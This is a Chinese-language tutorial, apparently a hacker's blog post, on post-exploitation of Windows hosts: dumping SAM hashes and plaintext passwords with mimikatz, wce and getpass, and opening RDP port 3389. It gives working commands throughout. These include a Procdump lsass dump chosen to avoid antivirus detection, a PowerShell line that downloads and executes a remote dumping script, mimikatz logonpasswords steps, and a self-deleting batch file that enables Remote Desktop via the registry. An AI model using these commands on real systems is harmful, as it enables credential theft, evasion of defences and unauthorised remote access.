导出Windows主机密码与开启3389

0x00 导出主机密码hash

  • 关于Windows的hash

    • 早期IBM设计的LM Hash算法存在弱点,微软在保持向后兼容性的同时提出了自己的挑战响应机制,即NTLM Hash
    • Windows hash由LM HASH和NT HASH两部分组成,形式为:用户名称:RID:LM-HASH值:NT-HASH值
    • 存储Windows hash的sam文件位置为:C:\windows\system32\config\SAM
  • 导出hash条件

    • administrator以上权限
  • 导出hash工具

    • wce
    • gethash
    • hashdump
    • SAMInside
  • 上传工具得到hash 查看是否为管理员以上权限 上传wce 得到hash

  • 在线网站解密hash

0x01 导出主机密码

  • 条件

    • administrator以上权限
    • 当前管理员没有注销登陆(可以通过query user命令看出)
  • 工具

    • mimikatz
    • getpass
  • 上传工具得到密码 查看是否为管理员以上权限 查看管理员是否注销登陆 上传getpass 得到密码1 得到密码2

  • 导出NTLM Hash本地得到密码
    若mimikatz和getpass这类软件被杀的话可以先用Procdump导出lsass.dmp,然后本地用mimikatz解密,Procdump是微软官方的软件,应该不会被杀

    • 导出文件dmp文件

      • 上传Procdump.exe导出
      Procdump.exe -accepteula -ma lsass.exe lsass.dmp
      
      • 或者执行PowerShell导出
      powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); "Get-Process lsass | Out-Minidump"
      
    • 下载导出的dmp文件后用本地mimikatz解密
      先输入:mimikatz.exe "sekurlsa::minidump lsass.dmp"
      后输入:sekurlsa::logonpasswords

0x02 开启3389

  • 直接使用注册表 新建开3389的注册表 开3389端口 成功开启3389端口

  • 写一个批处理也行

    # 3389.bat内容如下:
    echo Windows Registry Editor Version 5.00>>3389.reg 
    echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg 
    echo "fDenyTSConnections"=dword:00000000>>3389.reg 
    echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg 
    echo "PortNumber"=dword:00000d3d>>3389.reg 
    echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg 
    echo "PortNumber"=dword:00000d3d>>3389.reg 
    regedit /s 3389.reg 
    del 3389.reg
    del 3389.bat
    

    新建开3389的注册表


Reference(侵删):

https://www.cnblogs.com/hiccup/p/4380298.html

若未作声明则文章版权归本人(@reber)所有,转载请注明原文链接:

可以返回顶部